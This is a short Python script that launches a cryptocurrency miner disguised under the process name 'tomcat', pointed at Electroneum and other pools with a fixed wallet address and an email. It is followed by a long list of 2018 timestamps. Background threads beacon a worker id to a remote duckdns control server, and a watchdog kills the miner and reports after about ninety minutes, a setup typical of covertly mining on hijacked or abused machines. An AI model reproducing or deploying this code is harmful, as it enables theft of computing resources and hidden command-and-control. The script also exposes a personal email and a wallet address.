import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:31:04.182807
#2018-02-17 17:19:03.844936
#2018-02-17 19:07:06.324711
#2018-02-17 20:54:07.578195
#2018-02-17 22:40:09.487084
#2018-02-18 00:24:01.609015
#2018-02-18 02:15:07.919821
#2018-02-18 04:04:03.288837
#2018-02-18 05:55:05.148910
#2018-02-18 07:47:07.063408
#2018-02-18 09:35:05.813134
#2018-02-18 11:21:05.289445
#2018-02-18 13:07:04.577099
#2018-02-18 14:56:05.992762
#2018-02-18 16:44:06.388921
#2018-02-18 18:33:03.477260
#2018-02-18 20:21:03.420155
#2018-02-18 22:07:01.679298
#2018-02-18 23:54:07.411738
#2018-02-19 01:41:05.668235
#2018-02-19 03:29:05.661057
#2018-02-19 05:16:01.960272
#2018-02-19 07:02:06.016428
#2018-02-19 08:51:01.699638
#2018-02-19 10:40:05.219368
#2018-02-19 12:26:07.085849
#2018-02-19 14:13:04.384265
#2018-02-19 16:04:02.216452
#2018-02-19 17:52:05.770239
#2018-02-19 19:40:07.645205
#2018-02-19 21:28:02.140356
#2018-02-19 23:15:09.463978
#2018-02-20 01:01:07.029987
#2018-02-20 02:50:07.058253
#2018-02-20 04:37:03.771248
#2018-02-20 06:21:01.437022
#2018-02-20 08:06:04.444489
#2018-02-20 09:51:07.561388
#2018-02-20 11:35:07.054634
#2018-02-20 13:23:08.098521
#2018-02-20 15:08:08.705079
#2018-02-20 16:53:04.520953
#2018-02-20 18:41:08.522551
#2018-02-20 20:33:06.637607
#2018-02-20 22:18:06.527129
#2018-02-20 23:58:06.759075
#2018-02-21 01:43:07.470654
#2018-02-21 03:32:07.588212
#2018-02-21 05:21:07.131869
#2018-02-21 07:09:03.273203
#2018-02-21 08:55:06.111149
#2018-02-21 10:42:01.267081
#2018-02-21 12:30:10.651914
#2018-02-21 14:18:09.053125
#2018-02-21 16:06:02.068751
#2018-02-21 17:56:08.317426
#2018-02-21 19:42:07.264785
#2018-02-21 21:29:05.454588
#2018-02-21 23:16:05.341389
#2018-02-22 01:05:08.448001
#2018-02-22 02:54:03.865847
#2018-02-22 04:40:08.405261
#2018-02-22 06:25:06.908919
#2018-02-22 08:14:02.051844
#2018-02-22 10:02:06.385029
#2018-02-22 11:47:16.397198
#2018-02-22 13:34:09.608885
#2018-02-22 15:22:07.433460
#2018-02-22 17:09:01.605783
#2018-02-22 18:55:10.475342
#2018-02-22 20:47:05.546240
#2018-02-22 22:31:07.246983
#2018-02-23 00:17:06.819997
#2018-02-23 02:06:05.828295
#2018-02-23 03:55:08.971514
#2018-02-23 05:37:01.380196
#2018-02-23 07:22:01.692883
#2018-02-23 09:26:04.350238
#2018-02-23 11:31:04.562522
#2018-02-23 13:20:11.105502
#2018-02-23 15:06:11.052823
#2018-02-23 16:54:05.108406
#2018-02-23 18:43:01.492762
#2018-02-23 20:28:05.244060
#2018-02-23 22:17:01.940869
#2018-02-24 00:03:06.865555
#2018-02-24 01:53:03.688276
#2018-02-24 03:44:07.906487
#2018-02-24 05:33:05.333537
#2018-02-24 07:19:05.309488
#2018-02-24 09:09:01.617104
#2018-02-24 10:46:04.187931
#2018-02-24 12:28:07.883866
#2018-02-24 14:01:01.980525
#2018-02-24 15:41:06.320739
#2018-02-24 17:18:07.032614
#2018-02-24 18:52:05.240411
#2018-02-24 20:23:02.128760
#2018-02-24 21:52:04.073973
#2018-02-25 00:35:04.333772
#2018-02-25 02:39:06.615018
#2018-02-25 06:12:01.936840
#2018-02-25 11:40:06.423571